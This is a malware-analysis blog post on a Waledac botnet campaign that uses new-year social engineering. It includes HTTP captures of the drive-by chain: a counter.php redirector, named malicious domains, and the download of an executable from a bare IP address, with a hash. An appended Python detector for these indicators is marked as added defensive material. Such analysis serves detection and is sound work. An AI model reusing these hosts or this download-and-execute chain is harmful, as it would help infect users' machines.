Waledac returns with another attack strategy
After a long period of inactivity, the Waledac botnet is again deploying an infection strategy built on the pattern that characterizes it: social engineering, this time using the start of the new year as cover.
The most recent Waledac campaigns date from the middle of the year, when the propagation strategy pretended to be a video about Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.
Below are screenshots describing the timeline of Waledac's activity during 2009.
However, those behind Waledac never stopped: the registration dates of the domains they use show activity throughout the period of supposed inactivity.
Each page used for propagation contains an obfuscated script whose instructions execute automatically on the victim's machine. It exploits a weakness, then automatically downloads and executes the malware, turning the computer into a node of the botnet that carries on its activities. Below is a screenshot of the script.
Inside the script is a reference to the counter.php file, which hosts another script; from there it jumps to http://diokxbgrqkgg.com/ld/trest1/ and then to http://diokxbgrqkgg.com/nte/trest1.py, where yet another malicious script is found.
GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html
At this point the script downloads and runs a file called "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) from the IP address 95.169.190.208, hosted in Russia.
It's worth noting that this malware has a very low detection rate: to date it is detected by only 6 of 40 antivirus engines (VirusTotal report).
GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208
HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..
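As an added defender-side example (not code from the original post), the following Python parses HTTP exchanges like the captures above and flags the indicators the post describes: the counter.php fetch carrying a Referer from the landing page, an .exe requested from a bare-IP host, and a response body that begins with the PE "MZ" signature. The sample messages are constructed from the captures above; the indicator labels are my own.

```python
import re

# Minimal HTTP/1.x message parser: (start_line, headers, body); header names lower-cased.
def parse_http(raw):
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if value:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")

def indicators(raw_request, raw_response=""):
    """Return the set of indicator labels (my own names) matched by one exchange."""
    req_line, req_hdrs, _ = parse_http(raw_request)
    parts = req_line.split()
    path = parts[1] if len(parts) > 1 else ""
    found = set()
    if IPV4_HOST.match(req_hdrs.get("host", "")):
        found.add("bare-ip-host")        # payload served from a raw IP, no domain
    if path.lower().endswith(".exe"):
        found.add("exe-download")
    if path.endswith("/counter.php") and "referer" in req_hdrs:
        found.add("counter-redirector")  # landing page pulling the second-stage script
    if raw_response:
        _, _, body = parse_http(raw_response)
        if body.startswith("MZ"):
            found.add("pe-payload")      # DOS/PE header: an executable came back
    return found

def is_payload_fetch(found):
    """The stage the post captures: a PE body fetched from a bare-IP host."""
    return {"pe-payload", "bare-ip-host"} <= found

# Constructed samples, reduced from the captures in the post.
COUNTER_REQUEST = ("GET /counter.php HTTP/1.1\nHost: aju.nonprobs.com\n"
                   "Referer: http://aju.nonprobs.com/2010.html\n")
EXE_REQUEST = "GET /pr/pic/ny_foroplay.exe HTTP/1.0\nHost: 95.169.190.208\n"
EXE_RESPONSE = ("HTTP/1.0 200 OK\nContent-Type: application/octet-stream\n"
                "Content-Length: 416256\nServer: nginx/0.8.15\n\n"
                "MZ\x90\x00\x03\x00 ... This program cannot be run in DOS mode.")

if __name__ == "__main__":
    hits = indicators(EXE_REQUEST, EXE_RESPONSE)
    print(indicators(COUNTER_REQUEST), hits, is_payload_fetch(hits))
```

Fed real proxy or IDS captures, the same checks can be applied per request/response pair; the MZ check on the body catches the executable even when the URL path has been renamed to look like an image.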
Related information
Waledac/Storm. Past and present a threat
BlackHat SEO strategy proposed by Waledac
Waledac. Detailed tracking of a latent threat
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine